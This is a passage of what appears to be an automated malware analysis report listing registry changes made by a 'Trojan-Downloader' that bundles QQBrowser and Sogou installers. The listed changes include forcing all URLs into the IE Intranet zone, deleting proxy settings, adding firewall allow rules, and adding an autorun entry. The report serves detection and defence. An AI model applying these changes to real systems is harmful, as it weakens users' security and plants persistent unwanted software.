[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}]
"currentVersion" = "9.0.0.8"
[HKCR\QQBrowser.Protocol\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"
[HKCR\QQBrowser.File\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"BSOD" = "0"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NewInstall" = "1"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"ManifestVersion" = "2"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8\BackgroundDll]
"Path" = "QBSafe.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\QQBrowser.exe]
"DumpCount" = "10000"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"FirstLaunch" = "1"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8\BackgroundDll]
"LoadingTime" = "LoadAsInited"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\bugreport.exe]
"DumpFolder" = "\\tencent.com\tfs\跨部门项目\pcbrowser_dumps\dumps\WerDumps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"CountEndTimeHigh" = "0"
[HKLM\SOFTWARE\Tencent\QQBrowser]
"InstallDir" = "%Documents and Settings%\%current user%\Application Data\QB"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"DefaultBrowserFirstRun" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"CountStartTimeHigh" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E BF 9C C8 D8 17 91 63 75 DC A8 01 B2 9B D1 FE"
[HKLM\SOFTWARE\Tencent\QQBrowser]
"EXE" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Tencent\QBSts]
"silent" = "YES"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\QQBrowser.exe]
"CustomDumpFlags" = "0"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"InstallProcedure" = "0"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"DirectWriteFontRenderEnabled" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCR\QQBrowser.File\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\QB\uninst.exe"
[HKLM\SOFTWARE\Tencent\QBSts]
"InstallDate" = "20160519"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"TriggerTimes" = "0"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"RequiredMinVersion" = "9.0.1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"Publisher" = "腾讯科技(深圳)有限公司"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"STYLE" = "80"
[HKLM\SOFTWARE\Tencent\QQBrowser]
"Version" = "9.3.7078.400"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"BSODTimes" = "0"
[HKCR\Tencent.QQBrowser.Default\.exe\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe %*"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"Name" = "QBSafe"
[HKCU\Software\Tencent\QQBrowser]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB"
[HKCR\QQBrowser.File]
"(Default)" = "QQBrowser HTML Document"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"CountStartTimeLow" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\bugreport.exe]
"DumpType" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"QBPath" = "\DosDevices\%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\user data"
[HKCU\Software\Tencent\QQBrowser\ModuleDll]
"CommandOrder" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Tencent\QQBrowser]
"SupplyID" = "10009182"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"Operational" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\bugreport.exe]
"CustomDumpFlags" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"DefaultBrowser" = "%Program Files%\Internet Explorer\iexplore.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"DisplayVersion" = "9.3.7078.400"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"ID" = "{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"SID" = "S-1-5-21-1844237615-1960408961-1801674531-1003"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\Tencent.QQBrowser.Default\.exe\shell\run\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe %*"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"DisplayName" = "QQ浏览器"
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\QB\app.ico"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"DisableExceptionChainValidation" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\bugreport.exe]
"DumpCount" = "10000"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"QB9Overwrite8" = "0"
[HKCU\Software\Tencent\QQBrowser\Launch]
"EducationUrl" = "http://browser.qq.com/new/9.3/welcome.html"
The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Adds a rule to the Windows firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp]
"QQBrowserLiveup.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp\QQBrowserLiveup.exe:*:Enabled:QQBrowserLiveup"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400]
"QQBrowser.exe" = "%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qqbrowser.exe:*:Enabled:QQBrowser"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Adds a rule to the Windows firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data\QB]
"bugreport.exe" = "%Documents and Settings%\%current user%\Application Data\QB\BugReport.exe:*:Enabled:QQBrowserBugReport"
"QQBrowser.exe" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe:*:Enabled:QQBrowser"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"GlobalFlag"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"VerifierFlags"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQBrowser.exe]
"PageHeapFlags"
The process WiFi-2175.exe:664 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 5C B7 A4 15 23 0D AD 04 52 01 BF 89 A6 71 87"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "WiFi-2175.exe"
[HKLM\SOFTWARE\WiFi共享大师]
"PCID" = "B732ED8460021910C75C40DF2A6DAAC2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process BrowserProtect18.exe:2432 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKCU\Software\Classes\.gif]
"(Default)" = "QQBrowser.File"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\.swf]
"(Default)" = "QQBrowser.File"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 98 6C A0 11 6B C7 F6 BF D1 AF A0 C6 A7 BE E5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process QQBrowserOTA.exe:2012 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 C8 57 57 06 F0 3F 24 D3 4D 68 BF 08 95 AA 1F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1]
"QQBrowserOTA.exe" = "1"
The process ExternalApp.exe:1112 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SogouSoftware\download\download]
"MiniTPFw.exe" = "MiniTPFw Application"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D4D786E8-0535-41DB-91F8-B18ABBCCDE6C}]
"AppPath" = ""
[HKLM\SOFTWARE\SogouSoftware]
"InstallTime" = "80 67 3D 57 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"DisplayIcon" = "%Program Files%\SogouSoftware\SogouSoftware.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKU\S-1-5-19\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"
[HKU\.DEFAULT\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\S-1-5-19_CLASSES\SOFTWARE\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"UninstallString" = "%Program Files%\SogouSoftware\uninst.exe"
[HKCR\CLSID\{D4D786E8-0535-41DB-91F8-B18ABBCCDE6C}\LocalServer32]
"(Default)" = "%Program Files%\SogouSoftware\SogouSoftware.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"Publisher" = "Sogou.com"
[HKLM\SOFTWARE\SogouSoftware]
"InstallPath" = "%Program Files%\SogouSoftware"
"HWID" = "18 22 90 F2 32 6C B2 22 D4 F1 3E 5E D2 55 65 ED"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\SogouSoftware]
"ProgrameModulesDir" = "%Program Files%\SogouSoftware\3.1.13.79"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"DisplayVersion" = "3.1.13.79"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\SogouSoftware]
"LaunchAppPath" = "%Program Files%\SogouSoftware\SogouSoftware.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKU\S-1-5-20\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C F5 AF 6F D3 D1 7C 59 16 EE BF BC 88 AA 2B D4"
[HKLM\SOFTWARE\SogouSoftware]
"Version" = "3.1.13.79"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D4D786E8-0535-41DB-91F8-B18ABBCCDE6C}]
"AppName" = ""
"Policy" = "3"
[HKU\S-1-5-20_CLASSES\SOFTWARE\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"DisplayName" = "ÈüþÖúÊÖ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SogouSoftware" = "%Program Files%\SogouSoftware\SogouSoftware.exe /AutoRun"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process QBDownload.exe:2504 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\12au8967c\QBInstaller.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\12au8967c, , \??\%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\j3lx7ew39.exe,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
